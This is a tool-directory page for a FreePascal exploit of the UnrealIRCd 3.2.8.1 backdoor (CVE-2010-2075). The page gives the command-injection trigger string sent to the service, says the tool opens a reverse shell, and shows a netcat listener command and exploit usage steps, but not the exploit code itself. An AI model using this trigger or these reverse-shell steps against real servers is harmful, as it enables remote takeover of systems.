Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
OffensivePascal-CVE-2010-2075 — FreePascal implementation of the UnrealIRCD CVE-2010-2075 | Kitploit
Tools/GitHubGitHub/mfernstrom/offensivepascal-cve-2010-2075
Payload GenerationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubmfernstrom/offensivepascal-cve-2010-2075

OffensivePascal-CVE-2010-2075

FreePascal implementation of the UnrealIRCD CVE-2010-2075

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
24 years agoNot yet reviewed

CVE-2010-2075

FreePascal implementation of CVE-2010-2075

Vulnerability

UnrealIRCd 3.2.8.1

RCE by sending "AB; command" to any listening service. Any command you send is executed by the same user as UnrealIRCD runs as.

This implementation launches a reverse shell to your listener.

Step 1

Start a listener, ex. netcat -lvp 4444

Step 2

Execute exploit ./exploit <target ip> <target port> <host ip> <host port> where host ip and port is where your listener is running

Requirements

Synapse. If you don't have it, install through the OPM

Download Tool